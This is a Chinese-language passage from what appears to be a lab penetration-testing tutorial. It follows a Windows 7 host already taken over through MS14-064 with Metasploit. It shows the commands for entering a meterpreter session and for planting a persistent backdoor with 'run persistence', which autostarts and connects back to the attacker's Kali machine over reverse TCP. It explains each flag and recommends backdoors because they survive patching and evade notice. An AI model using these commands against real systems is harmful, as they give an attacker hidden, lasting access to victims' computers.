注意:
一旦开通一个会话连接后,若系统没有自动进入控制通道,则可以尝试回车,进行手动连接。
1)手动查看当前存在的会话
注意在目录msf>下,手动查看当前存在的会话。
**结果:**当前只有会话连接1,meterpreter建立的连接类型type是x86–32位的(由模块中的payload设定),以及展示目标主机192.168.10.45的基本信息和连接信息。
>sessions
2)选择连接当前已经开通的会话1
>sessions -i 1
**结果:**成功进入控制通道meterpreter,交互模式,表明攻击成功。
在kali控制win7后,通过persistence,在目标主机上生成一个后门程序,以便后续不再通过MS14-064漏洞进行二次入侵,而是通过这个后门文件来入侵该主机【注意在控制通道meterpreter>下】。
注意:因为这个MS14-064漏洞很容易被修复,一旦目标主机进行定期修补漏洞,那么通过MS14-064漏洞进行入侵的路径,就会失效,但植入的后门程序是不容易被发现和修复的,所以一旦入侵成功后,建议尝试植入后门程序。
通过persistence(支持多种方式启动)植入固定的后门程序,设置相关参数,设置回连地址和端口号。
>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21
重点关注6个参数配置:
-S:系统启动时自动加载本程序(因为该后门程序是不能被目标用户发现,更不需要让目标主机进行点
击启动的,所以需要该程序有自动加载的功能);
-U:用户登陆时自动加载本程序;
-X:开机时自动加载本程序;
-i: 自动加载后,回连的时间间隔,即后门每隔多少秒尝试连接回连地址;
-r: 自动加载后,回连的主机地址,回连到谁啊,自然是入侵的kali的地址;
-p:自动加载后,回连的端口号,即kali地址的端口号,理论上可随意设置,但范围不要超过65535,且
不可设置为常见的特殊的端口号;
**结果1:**在kali中提示,成功生成一个后门程序yqLAOjt.vbs,自动加载后会回连到192.168.10.21:40000,并保存于目标主机win7中的C:\Users\18044\AppData\Local\Temp\目录下。
【**注意:**payload自动设置为“windows/meterpreter/reverse_tcp”,LHOST设置为192.168.10.21,LPORT设置为40000】
**结果2:**在win7中的C:\Users\18044\AppData\Local\Temp\目录下,成功找到从攻击主机kali植入的后门程序yqLAOjt.vbs
